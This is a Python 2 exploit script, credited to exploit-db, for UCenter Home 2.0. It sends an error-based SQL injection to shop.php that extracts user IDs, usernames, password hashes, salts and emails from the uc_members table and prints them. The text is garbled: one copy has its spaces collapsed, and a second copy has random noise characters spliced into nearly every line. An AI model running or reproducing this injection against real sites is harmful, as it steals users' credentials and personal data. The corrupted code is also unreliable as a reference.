#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ Y7 r2 F& S! e6 U9 p. m
# {8 f$ L- }/ |/ ?, @2 g( {) W- ^9 D, `# K1 g6 @ h u: ^
#!/usr/bin/env python
$ [$ i' G, b9 O! j( P6 W4 S - ]- ~4 [" p0 s# l' m
import sys # ^' N" u! M) H$ U: o: u
import urllib2 / k9 B8 y Y5 r4 d
import re 1 n3 G1 n1 f5 k: c
7 A% L/ L; Q, }. f! x% z$ ?
def info():
' h5 |% f! v7 ~4 x* J& k& c print 'From:http://www.exploit-db.com/exploits/14997/'
& z9 D3 y1 G: [+ f/ j1 H* c print 'http://www.hake.cc/Web_loudong/' 7 s/ |" U! d% ]0 k
print 'changed:qiaoy' 4 H k- k4 ~2 _$ Q2 f, @, n- r- d
print 'exp:' 5 B# A/ N$ |) U9 j, B$ W
print ' ./UCenter_Home_2.0.py site'
$ Q" P8 K0 S; c; V% i5 J( E
* }; u1 h( c) B, ?; Rdef main():
" p0 L5 r+ M& z8 ~2 m- u if len(sys.argv) != 2:
/ ]' e" A3 s0 l, M info() , _; j( p) j% S$ q
else:
8 Q7 E5 c' T$ L6 o8 _( L site = sys.argv[1] ) F2 y5 d5 p8 _( v
if site[0:7] == 'http://': 3 O2 h: u, e9 p6 ?- m& _- `
sitesite =site
3 O. V, s& i" [# K* V. l! h elif site[0:8] == 'https://': 7 z- D3 e4 V! ], \4 ~
sitesite = site : x1 s* w g' J6 @* S# v* |
else:
Z* R3 n: w% Y/ S. d site = 'http://'+site * B1 Q. b8 l/ F ^
try:
8 w2 u t5 s, }7 e1 c j url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' / v2 @/ Y W- S
Value = urllib2.urlopen(url).read() ' D% G& a3 Q m$ _5 Y+ j' A$ ? `
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] . Q5 r/ Q$ c0 ]' {- d7 W2 B X, g
hacked = Msg.split(':')
8 ~0 b$ L: p: \# D print 'Name: '+hacked[1] 9 O/ m6 Z7 @9 U* |5 T; H- y
print 'Passwd: '+hacked[2] # j! |/ E/ e8 B" X1 [
print 'salt: '+hacked[3] ! j) h& A, v8 h
print 'email: '+hacked[4] & ^) p5 D5 A7 v$ w3 h
except:
) A5 p( a9 U- v+ F print 'Sorry,I can\'t work............'
- e J% S3 m4 T- e j0 ]
O7 m/ f) F7 N0 a& o- Iif __name__ == '__main__':
8 H% p5 `7 O x6 ` n main() |